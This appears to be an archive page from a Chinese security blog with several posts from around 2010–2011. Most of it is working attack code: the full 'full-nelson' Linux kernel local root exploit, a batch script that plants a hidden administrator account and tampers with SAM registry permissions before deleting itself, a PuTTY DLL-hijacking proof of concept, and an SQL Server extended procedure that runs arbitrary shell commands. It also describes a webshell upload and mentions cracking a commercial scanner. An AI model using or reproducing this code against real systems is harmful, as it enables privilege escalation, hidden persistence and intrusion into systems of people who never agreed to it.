
一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试

2011年4月10日 1 条评论 316 views

by:vitter@safechina.net
blog:blog.securitycn.net

早就跟相关人员说过 邮箱认证smtp和pop协议要做加密,否则在公司内网,太容易被人sniffer到明文密码了,另外邮箱密码和bbs公用,bbs也是采用的http协 议,没有用https,这些都是问题。虽然我们控制的网络部分已经做过处理了,ip和mac地址做了绑定,即使有人做arp欺骗后,除非不出网关,否则欺 骗后网络到达不了网关之外,因此嗅探明文邮箱密码已经不可能(由于邮箱服务器不在同一网段)。但是对于我们一些共用资源的服务器有公网ip和内网ip且处 于一个相对风险较高,而且没有根据安全级别进行过相应的安全策略的网络环境内,因此一些问题是显而易见的,但是某些人根本不以为然。所以我进行了一次简单 的内部渗透测试。

首先我从有公网ip和内网ip的网络段入手,如公网ip段是222.222.222.0/255.255.255.255,内网ip段192.168.0.0/255.255.255.0。

经过踩点发现222.222.222.77(192.168.0.77)上跑了一个老版本的某php的论坛。经过检测,存在上传漏洞,利用gif89a文件头欺骗漏洞上传webshell。然后上传个nst。


Exploits Linux Kernel <= 2.6.37 local privilege escalation

2010年12月16日 没有评论 393 views

/*

* Linux Kernel <= 2.6.37 local privilege escalation

* by Dan Rosenberg

* @djrbliss on twitter

*

* Usage:

* gcc full-nelson.c -o full-nelson

* ./full-nelson

*

* This exploit leverages three vulnerabilities to get root, all of which were

* discovered by Nelson Elhage:

*

* CVE-2010-4258

* -------------

* This is the interesting one, and the reason I wrote this exploit. If a

* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL

* word will be written to a user-specified pointer when that thread exits.

* This write is done using put_user(), which ensures the provided destination

* resides in valid userspace by invoking access_ok(). However, Nelson

* discovered that when the kernel performs an address limit override via

* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,

* etc.), this override is not reverted before calling put_user() in the exit

* path, allowing a user to write a NULL word to an arbitrary kernel address.

* Note that this issue requires an additional vulnerability to trigger.

*

* CVE-2010-3849

* -------------

* This is a NULL pointer dereference in the Econet protocol. By itself, it's

* fairly benign as a local denial-of-service. It's a perfect candidate to

* trigger the above issue, since it's reachable via sock_no_sendpage(), which

* subsequently calls sendmsg under KERNEL_DS.

*

* CVE-2010-3850

* -------------

* I wouldn't be able to reach the NULL pointer dereference and trigger the

* OOPS if users weren't able to assign Econet addresses to arbitrary

* interfaces due to a missing capabilities check.

*

* In the interest of public safety, this exploit was specifically designed to

* be limited:

*

* * The particular symbols I resolve are not exported on Slackware or Debian

* * Red Hat does not support Econet by default

* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and

* Debian

*

* However, the important issue, CVE-2010-4258, affects everyone, and it would

* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly

* more sophisticated version of this that doesn't have the roadblocks I put in

* to prevent abuse by script kiddies.

*

* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.

*

* NOTE: the exploit process will deadlock and stay in a zombie state after you

* exit your root shell because the Econet thread OOPSes while holding the

* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.

*

* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla

*/

#include <stdio.h>

#include <sys/socket.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <string.h>

#include <net/if.h>

#include <sched.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/utsname.h>

#include <sys/mman.h>

#include <unistd.h>

/* How many bytes should we clear in our

* function pointer to put it into userspace?
*
* SHIFT and OFFSET are the two per-architecture knobs of the chain the
* header describes: main() strips the high bits of the resolved
* econet_ioctl address with `<< SHIFT >> SHIFT` to derive the userspace
* landing page, and subtracts OFFSET from the econet_ops slot it hands to
* clone() as the CLONE_CHILD_CLEARTID target. SHIFT is a bit count
* (24 bits = 3 bytes on x86-64, 8 bits = 1 byte on i386) and OFFSET the
* matching byte count. */

#ifdef __x86_64__

#define SHIFT 24

#define OFFSET 3

#else

#define SHIFT 8

#define OFFSET 1

#endif

/* thanks spender... */

/*
 * Resolve the address of kernel symbol `name`.
 *
 * Sources tried, in order: /proc/kallsyms, then /proc/ksyms (pre-2.6
 * "oldstyle" format), then /boot/System.map-<uname release>. Returns the
 * address on the first exact match, or 0 when the symbol is not found in
 * any source (or no source could be opened). A successful lookup is echoed
 * to stdout.
 *
 * Defender's note: the whole chain below depends on an unprivileged reader
 * being able to learn kernel addresses from /proc/kallsyms or a
 * world-readable System.map; restricting those (kernel.kptr_restrict,
 * permissions on /boot) removes this resolution step.
 */
unsigned long get_kernel_sym(char *name)

{

FILE *f;

unsigned long addr;

char dummy;

/* Symbol-name scratch buffer, also reused for the System.map path.
 * NOTE: the fscanf %s conversions below carry no field width, so a
 * pathological line longer than 511 characters would overflow this. */
char sname[512];

struct utsname ver;

int ret;

/* rep: 1 once we are on the System.map fallback pass (used for the
 * status message and to stop after that pass). */
int rep = 0;

/* oldstyle: 1 when parsing the two-column /proc/ksyms / old System.map
 * format rather than the three-column kallsyms "addr type name" format. */
int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

goto fallback;

oldstyle = 1;

}

/* Entered twice at most: once for the /proc file, once (via `fallback`)
 * for System.map. */
repeat:

ret = 0;

while(ret != EOF) {

if (!oldstyle)

ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);

else {

ret = fscanf(f, "%p %s\n", (void **)&addr, sname);

if (ret == 2) {

char *p;

/* Skip module-versioned entries. */
if (strstr(sname, "_O/") || strstr(sname, "_S."))

continue;

/* Strip a trailing "_smp..." decoration (and any underscores
 * immediately before it) so the bare symbol name compares. */
p = strrchr(sname, '_');

if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char *)sname && *(p - 1) == '_')

p--;

*p = '\0';

}

}

}

/* Line did not parse as "address ..." — consume one token to make
 * progress and try the next line. Return value deliberately unchecked. */
if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (!strcmp(name, sname)) {

fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");

fclose(f);

return addr;

}

}

fclose(f);

/* Already tried System.map too: give up. */
if (rep)

return 0;

fallback:

uname(&ver);

/* System.map for non-2.6 kernels uses the two-column layout. */
if (strncmp(ver.release, "2.6", 3))

oldstyle = 1;

/* utsname.release is a fixed short array, so this fits in sname. */
sprintf(sname, "/boot/System.map-%s", ver.release);

f = fopen(sname, "r");

if (f == NULL)

return 0;

rep = 1;

goto repeat;

}

/* Function-pointer types for the two kernel credential routines the payload
 * calls. The addresses are not known at build time: main() fills the two
 * globals below from get_kernel_sym() at run time. regparm(3) presumably
 * mirrors the kernel's register-argument convention on i386 — confirm for
 * the target build; on x86-64 the attribute has no effect. The `cred`
 * parameter is typed as unsigned long because the struct is opaque here. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

/* Resolved in main(); both must be non-NULL before getroot() runs. */
_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

/* Kernel-context payload: swaps the calling task's credentials for fresh
 * kernel (root) credentials via prepare_kernel_cred(0) + commit_creds().
 * It is reached through trampoline(), not called directly from userspace.
 * Both parameters are unused; they exist so the signature matches the
 * ioctl-style callback slot it stands in for. The -1 return is presumably
 * what the ioctl() issued in main() sees as its result — confirm. */
static int __attribute__((regparm(3)))

getroot(void * file, void * vma)

{

commit_creds(prepare_kernel_cred(0));

return -1;

}

/* Why do I do this? Because on x86-64, the address of

* commit_creds and prepare_kernel_cred are loaded relative

* to rip, which means I can't just copy the above payload

* into my landing area.
*
* main() memcpy()s 1024 bytes starting at this function into the mmap()ed
* landing page, so the code must be position-independent: it loads the
* absolute address of getroot() into a register and calls through it. The
* copy is a fixed 1024 bytes regardless of the function's real length, so
* whatever the compiler laid out after trampoline() is copied along. */

void __attribute__((regparm(3)))

trampoline()

{

#ifdef __x86_64__

asm("mov $getroot, %rax; call *%rax;");

#else

asm("mov $getroot, %eax; call *%eax;");

#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg

* via sock_no_sendpage, so it's under KERNEL_DS
*
* Runs as the clone()d child (own stack, shared address space). `fildes`
* is main()'s descriptor array: [0]/[1] a pipe, [2] the Econet socket,
* [3] /dev/zero. Returns -1 if the interface ioctl fails; on the intended
* path the thread OOPSes inside the second splice() and never returns,
* which is what the CLONE_CHILD_CLEARTID write in the header relies on.
*
* Per the header, a kernel with CVE-2010-3849/3850 fixed, or with Econet
* not built/loaded, stops this at the SIOCSIFADDR step. */

int trigger(int * fildes)

{

int ret;

struct ifreq ifr;

memset(&ifr, 0, sizeof(ifr));

/* Interface name is hard-coded; "eth0" is shorter than IFNAMSIZ and the
 * struct was zeroed, so the name stays NUL-terminated despite strncpy. */
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

/* Assign an Econet address to eth0 (the missing capability check is
 * CVE-2010-3850 per the header). */
ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

if(ret < 0) {

printf("[*] Failed to set Econet address.\n");

return -1;

}

/* Push bytes from /dev/zero into the pipe, then from the pipe into the
 * Econet socket; the second splice() reaches sendmsg via sock_no_sendpage.
 * Return values are not checked. */
splice(fildes[3], NULL, fildes[1], NULL, 128, 0);

splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

/* Shouldn't get here... (exit(), not _exit(), in a CLONE_VM child — it
 * would run the parent's exit handlers on shared memory if reached) */

exit(0);

}

/*
 * Orchestrates the chain described in the header: open the descriptors,
 * resolve kernel symbols, map a userspace landing page at the masked
 * econet_ioctl address, clone() trigger() with the econet_ops slot as the
 * CLONE_CHILD_CLEARTID target, then call ioctl() on the Econet socket and
 * check getuid(). Returns -1 on any setup failure or if uid is still
 * non-zero; on success it execs /bin/sh and does not return.
 * argc/argv and the local `pid` are unused.
 */
int main(int argc, char * argv[])

{

unsigned long econet_ops, econet_ioctl, target, landing;

int fildes[4], pid;

void * newstack, * payload;

/* Create file descriptors now so there are two

references to them after cloning...otherwise

the child will never return because it

deadlocks when trying to unlock various

mutexes after OOPSing */

/* pipe()'s return value is not checked; if it fails fildes[0..1] are
 * uninitialised and the `< 0` test below reads indeterminate values. */
pipe(fildes);

fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);

fildes[3] = open("/dev/zero", O_RDONLY);

if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {

printf("[*] Failed to open file descriptors.\n");

return -1;

}

/* Resolve addresses of relevant symbols */

printf("[*] Resolving kernel addresses...\n");

econet_ioctl = get_kernel_sym("econet_ioctl");

econet_ops = get_kernel_sym("econet_ops");

commit_creds = (_commit_creds) get_kernel_sym("commit_creds");

prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {

printf("[*] Failed to resolve kernel symbols.\n");

return -1;

}

/* Stack for the clone()d child; never freed (process execs or exits). */
if(!(newstack = malloc(65536))) {

printf("[*] Failed to allocate memory.\n");

return -1;

}

printf("[*] Calculating target...\n");

/* Address handed to clone() as the child-tid pointer: a slot inside
 * econet_ops, moved back by OFFSET bytes (see the SHIFT/OFFSET macros). */
target = econet_ops + 10 * sizeof(void *) - OFFSET;

/* Clear the higher bits */

landing = econet_ioctl << SHIFT >> SHIFT;

/* Two pages, RWX, at the page containing `landing` — MAP_FIXED, so this
 * silently replaces anything already mapped there. */
payload = mmap((void *)(landing & ~0xfff), 2 * 4096,

PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

if ((long)payload == -1) {

printf("[*] Failed to mmap() at target address.\n");

return -1;

}

/* Fixed 1024-byte copy of trampoline() (and whatever follows it in .text)
 * into the landing page. */
memcpy((void *)landing, &trampoline, 1024);

/* glibc clone(fn, stack, flags, arg, ptid, tls, ctid): `target` is the
 * ctid pointer that CLONE_CHILD_CLEARTID zeroes on child exit — the
 * CVE-2010-4258 write from the header. Stack grows down, so pass the top. */
clone((int (*)(void *))trigger,

(void *)((unsigned long)newstack + 65536),

CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,

&fildes, NULL, NULL, target);

/* Crude synchronisation: assumes the child has OOPSed within a second. */
sleep(1);

printf("[*] Triggering payload...\n");

/* Dispatches through the Econet socket's (now modified) ioctl path. */
ioctl(fildes[2], 0, NULL);

if(getuid()) {

printf("[*] Exploit failed to get root.\n");

return -1;

}

printf("[*] Got root!\n");

/* execl() failure is not handled; main() then falls off the end. */
execl("/bin/sh", "/bin/sh", NULL);

}


隐藏用户的bat

2010年12月14日 1 条评论 384 views

一段隐藏用户的bat,注意脚本中的$不能去掉

REM Creates a local account "chinadu$" (the post says the trailing $ must
REM stay), adds it to Administrators, then uses regini to change access on
REM HKLM\SAM so the account's registry subtree can be exported (regedit /e),
REM the account deleted with net user /del, and the export re-imported
REM (regedit /s) so the registry entry outlives the normal user record.
REM Afterwards regini restores the SAM access, the temp files are removed
REM and the script deletes itself (del %0).
REM Detection / mitigation: every step here is a privileged, auditable
REM action — local account creation, group membership change, permission
REM changes under HKLM\SAM, and a self-deleting script; alert on those and
REM review "$"-suffixed local accounts. The [1] / [0] suffixes are regini
REM ACL specifiers (open access, then restore) — verify against the regini
REM documentation for the exact ACE meaning.

net user chinadu$ 4shell.org /add

net localgroup administrators chinadu$ /add

Echo HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] >>c:/tem.ini

regini c:/tem.ini

regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

net user chinadu$ /del

regedit /s c:\1.reg

REM Note: the first Echo below uses a single > and so overwrites tem.ini;
REM the following ones append.
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [0] >c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\ [0] >>c:/tem.ini

regini c:/tem.ini

del c:\tem.ini

del c:\1.reg

REM Self-delete: %0 is the running script's own path.
del %0


Web Vulnerability Scanner 7.0 Patch for 2010_09_21_01

2010年9月29日 3 条评论 456 views

Thanks for all
Update For Version 7
Does not work with the free version.

Acunetix WVS Build History

Build v7.0.20100921 - 22nd September 2010

New Security Check:

  • Added a security check for the latest OpenX OFC file upload vulnerability
  • Added an ASP.NET security check for the ASP.NET padding oracle vulnerability

Improvements:

  • Reduced the number of false positives for Blind SQL injections security checks
  • Improved Blind SQL injection tests by adding a number of new tests to detect blind SQL injections in UPDATE/INSERT/...

Bug fixes:

  • Fixed: Cookie encoding didn't work as expected in some cases
  • Fixed: Cookies were not always imported from AcuSensor data



如何执行一个渗透测试

2010年9月9日 没有评论 502 views

一个良好的渗透测试是什么组成的?

虽然执行一个渗透测试有许多明显的优点——执行渗透测试的价值在于它的结果。这些结果必须是有价值的,而且对于客户来说必须是很容易理解的。有一个常见的误解是认为渗透测试只是使用一些时髦的自动化安全工具,并处理所生成的报告。但是,成功执行一个渗透测试并不仅仅是需要安全工具。虽然这些自动化安全测试工具在实践中扮演了重要的角色,但是它们也是有缺点的。事实上,这些工具一直无法真正模拟一个高深攻击者的行为。不管安全工具完成的报告有多么全面,其中总是有一些需要解释的问题。

让我们看看构成一个良好渗透测试的一些关键因素:



什么是网络渗透测试?

2010年9月9日 没有评论 382 views

渗透测试是一种最老的评估计算机系统安全性的方法。在70年代初期,国防部就曾使用这种方法发现了计算机系统的安全漏洞,并促使开发构建更安全系统的程序。渗透测试越来越多地被许多组织用来保证信息系统和服务的安全性,从而使安全性漏洞在暴露之前就被修复。由于恶意代码、黑客、不满员工所造成的网络入侵、数据偷窃和攻击的频率和严重程度会继续增加,所以网络安全漏洞和数据偷窃所造成的风险和代价是极大的。由于企业电子化的兴起及其对安全性的要求,公司网络的远程访问也在增加。事实上,即使网络实现管理的很好,并使用了最新的硬件和软件,也仍然可能受到错误配置或软件缺陷的影响。这可能最终会将敏感信息的访问权限泄漏给入侵者。使用渗透测试工具则能够显著地减少这种情况的发生。

虽然渗透测试的主要目标是发现组织中网络基础架构的安全漏洞;但它也可能有许多次要目标,包括测试组织的安全问题识别和响应能力,测试员工安全知识或测试安全性政策规范等。



PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)

2010年8月26日 没有评论 305 views

/*

Exploit Title: PuTTY DLL Hijacking Exploit (winmm.dll)

Date: August 25, 2010

Author: storm (storm@gonullyourself.org)

Version: 0.60

Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o winmm.dll PuTTY-DLL.c -DWIN32_LEAN_AND_MEAN

PuTTY is a standalone program, so just plop the .dll in whatever directory the binary is in.

*/

#include <windows.h>

#define DllExport __declspec (dllexport)

/* Export stubs: one entry point per winmm.dll export, so that a copy of this
 * DLL dropped into the program's directory (see the header) satisfies the
 * loader's import resolution. Every stub forwards to hax(), which is defined
 * further down with no preceding prototype, so these calls rely on an
 * implicit declaration. The stubs take no parameters and ignore the real
 * signatures; none of them returns normally because hax() calls exit().
 * Mitigation side: this is the classic DLL search-order hijack — loading
 * system DLLs by full path, SafeDllSearchMode / SetDefaultDllDirectories,
 * and verifying signatures of loaded modules close it. */

DllExport void aux32Message() { hax(); }

DllExport void auxGetDevCapsA() { hax(); }

DllExport void auxGetDevCapsW() { hax(); }

DllExport void auxGetNumDevs() { hax(); }

DllExport void auxGetVolume() { hax(); }

DllExport void auxOutMessage() { hax(); }

DllExport void auxSetVolume() { hax(); }

DllExport void CloseDriver() { hax(); }

DllExport void DefDriverProc() { hax(); }

DllExport void DriverCallback() { hax(); }

DllExport void DrvGetModuleHandle() { hax(); }

DllExport void GetDriverModuleHandle() { hax(); }

DllExport void joy32Message() { hax(); }

DllExport void joyConfigChanged() { hax(); }

DllExport void joyGetDevCapsA() { hax(); }

DllExport void joyGetDevCapsW() { hax(); }

DllExport void joyGetNumDevs() { hax(); }

DllExport void joyGetPos() { hax(); }

DllExport void joyGetPosEx() { hax(); }

DllExport void joyGetThreshold() { hax(); }

DllExport void joyReleaseCapture() { hax(); }

DllExport void joySetCapture() { hax(); }

DllExport void joySetThreshold() { hax(); }

DllExport void mci32Message() { hax(); }

DllExport void mciDriverNotify() { hax(); }

DllExport void mciDriverYield() { hax(); }

DllExport void mciExecute() { hax(); }

DllExport void mciFreeCommandResource() { hax(); }

DllExport void mciGetCreatorTask() { hax(); }

DllExport void mciGetDeviceIDA() { hax(); }

DllExport void mciGetDeviceIDFromElementIDA() { hax(); }

DllExport void mciGetDeviceIDFromElementIDW() { hax(); }

DllExport void mciGetDeviceIDW() { hax(); }

DllExport void mciGetDriverData() { hax(); }

DllExport void mciGetErrorStringA() { hax(); }

DllExport void mciGetErrorStringW() { hax(); }

DllExport void mciGetYieldProc() { hax(); }

DllExport void mciLoadCommandResource() { hax(); }

DllExport void mciSendCommandA() { hax(); }

DllExport void mciSendCommandW() { hax(); }

DllExport void mciSendStringA() { hax(); }

DllExport void mciSendStringW() { hax(); }

DllExport void mciSetDriverData() { hax(); }

DllExport void mciSetYieldProc() { hax(); }

DllExport void mid32Message() { hax(); }

DllExport void midiConnect() { hax(); }

DllExport void midiDisconnect() { hax(); }

DllExport void midiInAddBuffer() { hax(); }

DllExport void midiInClose() { hax(); }

DllExport void midiInGetDevCapsA() { hax(); }

DllExport void midiInGetDevCapsW() { hax(); }

DllExport void midiInGetErrorTextA() { hax(); }

DllExport void midiInGetErrorTextW() { hax(); }

DllExport void midiInGetID() { hax(); }

DllExport void midiInGetNumDevs() { hax(); }

DllExport void midiInMessage() { hax(); }

DllExport void midiInOpen() { hax(); }

DllExport void midiInPrepareHeader() { hax(); }

DllExport void midiInReset() { hax(); }

DllExport void midiInStart() { hax(); }

DllExport void midiInStop() { hax(); }

DllExport void midiInUnprepareHeader() { hax(); }

DllExport void midiOutCacheDrumPatches() { hax(); }

DllExport void midiOutCachePatches() { hax(); }

DllExport void midiOutClose() { hax(); }

DllExport void midiOutGetDevCapsA() { hax(); }

DllExport void midiOutGetDevCapsW() { hax(); }

DllExport void midiOutGetErrorTextA() { hax(); }

DllExport void midiOutGetErrorTextW() { hax(); }

DllExport void midiOutGetID() { hax(); }

DllExport void midiOutGetNumDevs() { hax(); }

DllExport void midiOutGetVolume() { hax(); }

DllExport void midiOutLongMsg() { hax(); }

DllExport void midiOutMessage() { hax(); }

DllExport void midiOutOpen() { hax(); }

DllExport void midiOutPrepareHeader() { hax(); }

DllExport void midiOutReset() { hax(); }

DllExport void midiOutSetVolume() { hax(); }

DllExport void midiOutShortMsg() { hax(); }

DllExport void midiOutUnprepareHeader() { hax(); }

DllExport void midiStreamClose() { hax(); }

DllExport void midiStreamOpen() { hax(); }

DllExport void midiStreamOut() { hax(); }

DllExport void midiStreamPause() { hax(); }

DllExport void midiStreamPosition() { hax(); }

DllExport void midiStreamProperty() { hax(); }

DllExport void midiStreamRestart() { hax(); }

DllExport void midiStreamStop() { hax(); }

DllExport void mixerClose() { hax(); }

DllExport void mixerGetControlDetailsA() { hax(); }

DllExport void mixerGetControlDetailsW() { hax(); }

DllExport void mixerGetDevCapsA() { hax(); }

DllExport void mixerGetDevCapsW() { hax(); }

DllExport void mixerGetID() { hax(); }

DllExport void mixerGetLineControlsA() { hax(); }

DllExport void mixerGetLineControlsW() { hax(); }

DllExport void mixerGetLineInfoA() { hax(); }

DllExport void mixerGetLineInfoW() { hax(); }

DllExport void mixerGetNumDevs() { hax(); }

DllExport void mixerMessage() { hax(); }

DllExport void mixerOpen() { hax(); }

DllExport void mixerSetControlDetails() { hax(); }

DllExport void mmDrvInstall() { hax(); }

DllExport void mmGetCurrentTask() { hax(); }

DllExport void mmioAdvance() { hax(); }

DllExport void mmioAscend() { hax(); }

DllExport void mmioClose() { hax(); }

DllExport void mmioCreateChunk() { hax(); }

DllExport void mmioDescend() { hax(); }

DllExport void mmioFlush() { hax(); }

DllExport void mmioGetInfo() { hax(); }

DllExport void mmioInstallIOProcA() { hax(); }

DllExport void mmioInstallIOProcW() { hax(); }

DllExport void mmioOpenA() { hax(); }

DllExport void mmioOpenW() { hax(); }

DllExport void mmioRead() { hax(); }

DllExport void mmioRenameA() { hax(); }

DllExport void mmioRenameW() { hax(); }

DllExport void mmioSeek() { hax(); }

DllExport void mmioSendMessage() { hax(); }

DllExport void mmioSetBuffer() { hax(); }

DllExport void mmioSetInfo() { hax(); }

DllExport void mmioStringToFOURCCA() { hax(); }

DllExport void mmioStringToFOURCCW() { hax(); }

DllExport void mmioWrite() { hax(); }

DllExport void mmsystemGetVersion() { hax(); }

DllExport void mmTaskBlock() { hax(); }

DllExport void mmTaskCreate() { hax(); }

DllExport void mmTaskSignal() { hax(); }

DllExport void mmTaskYield() { hax(); }

DllExport void mod32Message() { hax(); }

DllExport void mxd32Message() { hax(); }

DllExport void NotifyCallbackData() { hax(); }

DllExport void OpenDriver() { hax(); }

DllExport void PlaySound() { hax(); }

DllExport void PlaySoundA() { hax(); }

DllExport void PlaySoundW() { hax(); }

DllExport void SendDriverMessage() { hax(); }

DllExport void sndPlaySoundA() { hax(); }

DllExport void sndPlaySoundW() { hax(); }

DllExport void tid32Message() { hax(); }

DllExport void timeBeginPeriod() { hax(); }

DllExport void timeEndPeriod() { hax(); }

DllExport void timeGetDevCaps() { hax(); }

DllExport void timeGetSystemTime() { hax(); }

DllExport void timeGetTime() { hax(); }

DllExport void timeKillEvent() { hax(); }

DllExport void timeSetEvent() { hax(); }

DllExport void waveInAddBuffer() { hax(); }

DllExport void waveInClose() { hax(); }

DllExport void waveInGetDevCapsA() { hax(); }

DllExport void waveInGetDevCapsW() { hax(); }

DllExport void waveInGetErrorTextA() { hax(); }

DllExport void waveInGetErrorTextW() { hax(); }

DllExport void waveInGetID() { hax(); }

DllExport void waveInGetNumDevs() { hax(); }

DllExport void waveInGetPosition() { hax(); }

DllExport void waveInMessage() { hax(); }

DllExport void waveInOpen() { hax(); }

DllExport void waveInPrepareHeader() { hax(); }

DllExport void waveInReset() { hax(); }

DllExport void waveInStart() { hax(); }

DllExport void waveInStop() { hax(); }

DllExport void waveInUnprepareHeader() { hax(); }

DllExport void waveOutBreakLoop() { hax(); }

DllExport void waveOutClose() { hax(); }

DllExport void waveOutGetDevCapsA() { hax(); }

DllExport void waveOutGetDevCapsW() { hax(); }

DllExport void waveOutGetErrorTextA() { hax(); }

DllExport void waveOutGetErrorTextW() { hax(); }

DllExport void waveOutGetID() { hax(); }

DllExport void waveOutGetNumDevs() { hax(); }

DllExport void waveOutGetPitch() { hax(); }

DllExport void waveOutGetPlaybackRate() { hax(); }

DllExport void waveOutGetPosition() { hax(); }

DllExport void waveOutGetVolume() { hax(); }

DllExport void waveOutMessage() { hax(); }

DllExport void waveOutOpen() { hax(); }

DllExport void waveOutPause() { hax(); }

DllExport void waveOutPrepareHeader() { hax(); }

DllExport void waveOutReset() { hax(); }

DllExport void waveOutRestart() { hax(); }

DllExport void waveOutSetPitch() { hax(); }

DllExport void waveOutSetPlaybackRate() { hax(); }

DllExport void waveOutSetVolume() { hax(); }

DllExport void waveOutUnprepareHeader() { hax(); }

DllExport void waveOutWrite() { hax(); }

DllExport void wid32Message() { hax(); }

DllExport void wod32Message() { hax(); }

DllExport void WOW32DriverCallback() { hax(); }

DllExport void WOW32ResolveMultiMediaHandle() { hax(); }

DllExport void WOWAppExit() { hax(); }

/* Proof-of-concept payload shared by every export stub and by DllMain:
 * launches "calc" via WinExec and then terminates the host process with
 * exit(0), so the trailing `return 0` is unreachable. Defined after its
 * first use above (no prototype precedes the stubs). Declared with empty
 * parentheses rather than (void). */
int hax()

{

WinExec("calc", 0);

exit(0);

return 0;

}

/* DLL entry point: runs hax() for every fdwReason (attach and detach
 * alike), so the payload fires the moment the loader maps this module —
 * none of the export stubs is actually reached. `return 0` (FALSE, which
 * would tell the loader that initialisation failed) is unreachable because
 * hax() calls exit(). All three parameters are unused. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

hax();

return 0;

}


xp_hello.dll(sa) 提权

2010年8月26日 没有评论 426 views

来源:冰点论坛 2月

主要代码:

在VC6里面新建一个储存过程项目,在proc.cpp中写入如下代码:

#include <stdafx.h>

#include <shellapi.h>

// Return codes of the extended stored procedure (ODS convention:
// 0 = success, 1 = failure).
#define XP_NOERROR 0

#define XP_ERROR 1

// Buffer sizes used by xp_hello(). MAXCOLNAME is declared but not used in
// this listing.
#define MAXCOLNAME 25

#define MAXNAME 25

#define MAXTEXT 255

// Export xp_hello with C linkage so the entry point keeps its plain name
// for registration with SQL Server.
#ifdef __cplusplus

extern “C” {

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);

#ifdef __cplusplus

}

#endif

// Extended stored procedure: takes exactly one RPC parameter, echoes it back
// to the client as an informational message and runs it through
// `cmd.exe /c` via ShellExecute. Returns XP_ERROR when the parameter count
// is not 1 or the parameter is empty, XP_NOERROR otherwise (the result of
// ShellExecute is not checked).
//
// Risk note (for whoever finds this on a server): any login granted EXECUTE
// on this xp gets operating-system command execution as the SQL Server
// service account — the same exposure as xp_cmdshell, without its
// configuration switch. Restrict who can register extended stored
// procedures (sp_addextendedproc) and audit the DLLs SQL Server has loaded.
RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc)

{

/***************************** Note *************************

Whether through bad luck or something else, the library I have has no

srv_paraminfo function, so I fell back on the old-style srv_paramdata.

*************************************************************/

int bufLen;

DBCHAR spName[MAXNAME];

DBCHAR spText[MAXTEXT];

DBCHAR spBuf[MAXTEXT];

unsigned char cmdline[255] = “”;

if(srv_rpcparams(srvproc) != 1) return XP_ERROR; // parameter check: bail out unless exactly one parameter was passed

bufLen = srv_paramlen(srvproc,1);

if(!bufLen) return XP_ERROR;

// Fetch the first parameter's value. Two hazards here: the parameter data
// is used as the wsprintf FORMAT string (so % sequences in it are
// interpreted), and neither wsprintf nor the spBuf[bufLen] store is bounded
// by MAXTEXT — bufLen is never compared against sizeof(spBuf).
wsprintf(spBuf,(DBCHAR*)srv_paramdata(srvproc,1));spBuf[bufLen] = ‘\0′; // fetch the first parameter's value

wsprintf(spName, “xp_hello”);

wsprintf(spText, “%s Run command:[%s]\r\n\t\t\tMSN:ylbhz@hotmail.com”, spName,spBuf);

srv_sendmsg(srvproc,SRV_MSG_INFO,0,(DBTINYINT)0,(DBTINYINT)0,NULL,0,0,spText,SRV_NULLTERM); // send message

// Build the argument: cmdline is the same size as spBuf (255), so the
// added "/c " prefix can overrun it for a maximal-length parameter.
wsprintf((char*)cmdline,”/c %s”,spBuf); // build the argument

ShellExecute(0,”open”,”cmd.exe”,(char*)cmdline,NULL,SW_SHOW); // run the command

return XP_NOERROR ;

}



